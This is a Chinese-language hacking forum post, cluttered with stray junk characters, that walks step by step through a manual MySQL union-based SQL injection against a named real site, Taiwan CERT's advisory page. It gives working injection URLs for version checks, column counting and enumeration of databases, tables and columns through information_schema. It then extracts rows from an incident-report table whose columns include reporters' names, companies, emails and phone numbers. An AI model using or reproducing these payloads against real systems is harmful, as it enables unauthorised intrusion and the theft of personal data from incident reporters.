1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
* r# k5 Q5 n+ c5 w2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解/ D4 u# w: I$ Y t( [4 }0 ~! [- v' s
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--. D+ T% Z" o$ c. O( \- u9 b
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
7 F! m/ o# A- `1 W1 q数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。. w9 D( ]6 A1 L
4.判断有没有写权限
# K" ^; P0 F) chttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
" @) n# ]6 Z3 T2 B) L没办法,手动猜表啦
% k; _, {. g7 @% d7 N0 a3 G- Q, {5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,13 I: k0 x2 C! ~7 A& ^
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下8 Z$ R- u- u: x" ]
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--- a0 v' y: ^" o( `
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
, {8 N, e6 k2 Q4 k5 U; Vinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb) \6 Z& C1 g0 l
6.爆表,爆的是twcert库
* V- b$ i* t2 _0 \http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--. Z/ H6 f2 A' u/ V( Y/ z' @3 r, T
爆出如下表! l& V. v8 j8 Y8 J3 u6 C
downloadfile,irsys,newsdata,secrpt,secrpt_big5& j% x. Z3 m" R3 _8 r( k
7.爆列名,这次爆的是irsys表
) E( m7 V2 s) [# @5 V% E' jhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--# G3 u) q h0 \& C
爆出如下列" Z+ u* m/ G6 M0 K& e$ a
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
3 q8 g( ]; \* N/ e, }8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
+ E- m6 p+ {! t( r; L3 ^http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
$ c% L7 p( c; b1 h8 r1 n返回是3,说明每个列里有3个地段
7 Q; V( P/ Q9 K3 ^ p9.爆字段内容* ~8 Y9 G+ A& C' w3 ~4 n7 W: ~1 A
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
5 o. J1 C i- G爆出name列的第一个字段的内容
% U; p# z8 |6 o9 j2 chttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--" W. l- j/ w7 h( M6 t! t2 ^. I( e3 P
爆出name列的第二个字段的内容 |